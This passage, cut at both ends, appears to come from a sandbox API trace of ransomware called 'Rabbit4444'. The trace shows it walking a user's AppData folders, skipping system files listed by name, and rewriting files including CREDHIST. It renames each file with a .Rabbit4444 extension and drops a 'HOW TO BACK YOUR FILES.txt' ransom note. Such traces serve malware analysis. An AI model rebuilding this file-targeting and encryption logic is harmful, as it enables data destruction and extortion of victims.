lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.602] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43fd72ee, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x43fd72ee, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xde511f85, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0xa8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ContentStore.xml", cAlternateFileName="CONTEN~1.XML")) returned 1 [0052.602] lstrcmpiW (lpString1="ContentStore.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.602] lstrcmpiW (lpString1="ContentStore.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.602] lstrcmpiW (lpString1="ContentStore.xml", lpString2="Rabbit4444.exe") returned -1 [0052.602] lstrcmpiW (lpString1="ContentStore.xml", lpString2=".") returned 1 [0052.602] lstrcmpiW (lpString1="ContentStore.xml", lpString2="..") returned 1 [0052.602] lstrcmpiW (lpString1="ContentStore.xml", lpString2="windows") returned -1 [0052.602] lstrcmpiW (lpString1="ContentStore.xml", lpString2="bootmgr") returned 1 [0052.602] lstrcmpiW (lpString1="ContentStore.xml", lpString2="pagefile.sys") returned -1 [0052.602] lstrcmpiW (lpString1="ContentStore.xml", lpString2="boot") returned 1 [0052.602] lstrcmpiW (lpString1="ContentStore.xml", lpString2="ids.txt") returned -1 [0052.602] lstrcmpiW (lpString1="ContentStore.xml", lpString2="NTUSER.DAT") returned -1 [0052.602] lstrcpyW (in: lpString1=0x130ebc0, lpString2="ContentStore.xml" | out: lpString1="ContentStore.xml") returned="ContentStore.xml" [0052.602] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml", dwFileAttributes=0x0) returned 1 [0052.603] lstrlenW (lpString="ContentStore.xml") returned 16 [0052.603] lstrlenW (lpString="Rabbit4444") returned 10 [0052.603] lstrcmpiW (lpString1="tStore.xml", lpString2="Rabbit4444") returned 1 [0052.603] lstrlenW (lpString=".dll") returned 4 [0052.603] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0052.603] lstrlenW (lpString=".lnk") returned 4 [0052.603] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0052.603] lstrlenW (lpString=".ini") returned 4 [0052.603] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0052.603] lstrlenW (lpString=".sys") returned 4 [0052.603] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0052.603] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.603] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.603] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14391415363) returned 1 [0052.603] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=168) returned 1 [0052.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0052.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0052.604] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x298 [0052.605] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x70000 [0052.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0052.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0052.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0052.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0052.606] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14391697136) returned 1 [0052.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0052.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0052.606] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.606] CloseHandle (hObject=0x298) returned 1 [0052.606] CloseHandle (hObject=0x278) returned 1 [0052.607] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.Rabbit4444") returned 95 [0052.607] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml.rabbit4444"), dwFlags=0x1) returned 1 [0052.607] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43fd72ee, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x43fd72ee, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xde511f85, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0xa8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ContentStore.xml", cAlternateFileName="CONTEN~1.XML")) returned 0 [0052.607] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0052.607] lstrcpyW (in: lpString1=0x130ebc0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.607] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\publisher building blocks\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.609] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.609] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.609] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.609] CloseHandle (hObject=0x278) returned 1 [0052.609] CloseHandle (hObject=0x27c) returned 1 [0052.609] GetCurrentThreadId () returned 0xd98 [0052.609] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120578 [0052.610] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher" [0052.610] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xef950 | out: hHeap=0xe0000) returned 1 [0052.610] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120570 | out: hHeap=0xe0000) returned 1 [0052.610] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher" [0052.610] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\" [0052.610] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\.BFC0E91B00AE8A0620D3" [0052.610] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\publisher\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.611] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.614] FlushFileBuffers (hFile=0x27c) returned 1 [0052.614] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.615] CloseHandle (hObject=0x27c) returned 1 [0052.615] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher") returned 51 [0052.615] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.615] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x422eea37, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x422eea37, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe8af5c1f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0052.615] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.615] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.615] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.615] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.615] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x422eea37, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x422eea37, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe8af5c1f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.616] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.616] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.616] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.616] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.616] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.616] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8af5c1f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8af5c1f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8af5c1f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.616] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.616] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.616] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8af5c1f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8af5c1f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8af5c1f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.616] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0052.616] lstrcpyW (in: lpString1=0x130eba0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.616] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\publisher\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.616] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.616] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.617] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.617] CloseHandle (hObject=0x278) returned 1 [0052.617] CloseHandle (hObject=0x27c) returned 1 [0052.617] GetCurrentThreadId () returned 0xd98 [0052.617] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1204b8 [0052.617] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect" [0052.617] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103f58 | out: hHeap=0xe0000) returned 1 [0052.617] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1204b0 | out: hHeap=0xe0000) returned 1 [0052.617] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect" [0052.617] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\" [0052.617] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\.BFC0E91B00AE8A0620D3" [0052.617] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.620] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.622] FlushFileBuffers (hFile=0x27c) returned 1 [0052.623] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.623] CloseHandle (hObject=0x27c) returned 1 [0052.624] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect") returned 49 [0052.624] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.624] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fb5efac, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b7903de, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe8af5c1f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0052.624] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.624] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.624] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.624] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.624] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fb5efac, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b7903de, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe8af5c1f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.624] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.624] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.624] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.624] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.624] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.624] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8af5c1f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8af5c1f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8af5c1f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.624] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.624] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.624] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3a5eb6e1, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a5eb6e1, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x2b89fccb, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0x2e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0052.624] lstrcmpiW (lpString1="CREDHIST", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.624] lstrcmpiW (lpString1="CREDHIST", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.624] lstrcmpiW (lpString1="CREDHIST", lpString2="Rabbit4444.exe") returned -1 [0052.624] lstrcmpiW (lpString1="CREDHIST", lpString2=".") returned 1 [0052.624] lstrcmpiW (lpString1="CREDHIST", lpString2="..") returned 1 [0052.624] lstrcmpiW (lpString1="CREDHIST", lpString2="windows") returned -1 [0052.624] lstrcmpiW (lpString1="CREDHIST", lpString2="bootmgr") returned 1 [0052.624] lstrcmpiW (lpString1="CREDHIST", lpString2="pagefile.sys") returned -1 [0052.624] lstrcmpiW (lpString1="CREDHIST", lpString2="boot") returned 1 [0052.624] lstrcmpiW (lpString1="CREDHIST", lpString2="ids.txt") returned -1 [0052.624] lstrcmpiW (lpString1="CREDHIST", lpString2="NTUSER.DAT") returned -1 [0052.625] lstrcpyW (in: lpString1=0x130eb9c, lpString2="CREDHIST" | out: lpString1="CREDHIST") returned="CREDHIST" [0052.625] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST", dwFileAttributes=0x22) returned 1 [0052.625] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST", dwFileAttributes=0x6) returned 1 [0052.625] lstrlenW (lpString="CREDHIST") returned 8 [0052.625] lstrlenW (lpString="Rabbit4444") returned 10 [0052.626] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0052.626] lstrlenW (lpString=".dll") returned 4 [0052.626] lstrcmpiW (lpString1="HIST", lpString2=".dll") returned 1 [0052.626] lstrlenW (lpString=".lnk") returned 4 [0052.626] lstrcmpiW (lpString1="HIST", lpString2=".lnk") returned 1 [0052.626] lstrlenW (lpString=".ini") returned 4 [0052.626] lstrcmpiW (lpString1="HIST", lpString2=".ini") returned 1 [0052.626] lstrlenW (lpString=".sys") returned 4 [0052.626] lstrcmpiW (lpString1="HIST", lpString2=".sys") returned 1 [0052.626] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.626] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.626] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14393669105) returned 1 [0052.626] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=744) returned 1 [0052.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0052.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0052.626] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5f0, lpName=0x0) returned 0x298 [0052.627] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5f0) returned 0x70000 [0052.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0052.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0052.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0052.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0052.628] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14393908582) returned 1 [0052.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0052.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0052.628] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.629] CloseHandle (hObject=0x298) returned 1 [0052.629] CloseHandle (hObject=0x278) returned 1 [0052.629] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.Rabbit4444") returned 69 [0052.629] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\credhist"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\credhist.rabbit4444"), dwFlags=0x1) returned 1 [0052.629] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fb5efac, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x5c020c86, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0x5c020c86, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", 